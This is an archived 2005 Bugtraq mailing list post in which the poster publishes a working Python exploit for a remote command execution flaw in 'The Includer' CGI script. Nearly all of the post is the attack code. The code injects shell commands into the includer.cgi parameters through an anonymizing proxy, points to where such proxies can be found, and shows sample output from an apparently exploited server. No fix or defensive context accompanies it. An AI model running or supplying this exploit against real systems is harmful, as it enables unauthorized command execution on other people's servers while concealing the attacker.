lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4231FCED.4030002@mybox.it>
Date: Fri, 11 Mar 2005 20:17:49 +0000
From: mozako <mozako@...ox.it>
To: bugtraq@...urityfocus.com
Subject: [badroot.org] The Includer remote commands execution exploit


[badroot security] includer.cgi remote commands execution vulnerability 
remote exploit.

#!/usr/bin/python
# The Includer remote commands execution exploit v. 2
# Exploit by: mozako - mozako[at]mybox[dot]it
# Vuln. discovered by: Francisco Alisson
#
# (C) 2005 - badroot security
# http://www.badroot.org
# PRIVATE - FUNNY, WITH PROXY !!!
#
# mozako@...ja:~$ ./includer.py -h http://host-vuln.com/ -c uname -ar
# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# The Includer remote commands execution exploit
# PRIVATE - FUNNY, WITH PROXY !!!
# by: mozako
# =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Type '1' for includer.cgi?=[] injection or '2' for 
includer.cgi?template=[] injection: 2
# [X] Connecting...
# Type your proxy (IP:PORT) here: 148.244.150.58:80
# [X] Proxing... [OK]
# [X] Sending exploit... [OK]
# [X] Exploited !
#
# Linux ipx10254 2.4.21-192-smp4G #1 SMP Wed Feb 18 19:27:48 UTC 2004 
i686 i686 i386 GNU/Linux
#
# enjoy !
import sys
import urllib
import linecache
__argv__ = sys.argv
print """=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The Includer remote commands execution exploit
PRIVATE - FUNNY, WITH PROXY !!!
by: mozako
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="""
def usage():
    print """
The Includer remote commands execution exploit
by: mozako
7.3.2005
Usage:
$ ./phpN.py -h http://123.4.5.6/Includer_PATH/ -c COMMAND
          """
    sys.exit(-1)
if len(__argv__) < 4:
    usage()
host = __argv__[2]
if len(__argv__) > 4:
    __argv__=__argv__[4:]
    send=""
    for elem in __argv__[:-1]:
        send=send+elem+"%20"
    send = send + __argv__[-1]
else:
    send == __argv__[4]
def hack2():
    print "[X] Connecting..."
    proxer = raw_input("Type your proxy (IP:PORT) here: ")
    proxy = {'http': 'http://' + proxer} # PROXY !!! (find here: 
http://www.aliveproxy.com/high-anonymity-proxy-list)
    print "[X] Proxing...",
    url = urllib.FancyURLopener(proxy)
    print "[OK]"
    print "[X] Sending exploit...",
    stack = url.open(host + "includer.cgi?template=|" + send + "|")
    read = stack.read()
    print "[OK]"
    print "[X] Exploited !\n"
    t_file = open('temp.txt', 'w')
    print >> t_file, read
    t_file = open('temp.txt', 'r')
    for line in linecache.getlines("temp.txt"):
        if(line[0:16]=="document.write('"):
            print line[16:-4]
        elif(line[0:18]=="document.writeln('"):
            print line[18:-4]
        elif(line[0]=="<"):
            pass
        elif(line[0:2]=="*/"):
            pass
        elif(line[0:2]=="/*"):
            pass
        else:
            print line[:-1]
def hack():
    print "[X] Connecting..."
    proxer = raw_input("Type your proxy (IP:PORT) here: ")
    proxy = {'http': 'http://' + proxer} # PROXY !!! (find here: 
http://www.aliveproxy.com/high-anonymity-proxy-list)
    print "[X] Proxing...",
    url = urllib.FancyURLopener(proxy)
    print "[OK]"
    print "[X] Sending exploit...",
    stack = url.open(host + "includer.cgi?=|" + send + "|")
    read = stack.read()
    print "[OK]"
    print "[X] Exploited !\n"
    t_file = open('temp.txt', 'w')
    print >> t_file, read
    t_file = open('temp.txt', 'r')
    for line in linecache.getlines("temp.txt"):
        if(line[0:16]=="document.write('"):
            print line[16:-4]
        elif(line[0:18]=="document.writeln('"):
            print line[18:-4]
        elif(line[0]=="<"):
            pass
        elif(line[0:2]=="*/"):
            pass
        elif(line[0:2]=="/*"):
            pass
        else:
            print line[:-1]
choise = raw_input("Type '1' for includer.cgi?=[] injection or '2' for 
includer.cgi?template=[] injection: ")
if choise == "1":
    hack()
if choise == "2":
    hack2()
# eof

enjoy,
mozako - mozako [at] mybox [dot] it


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ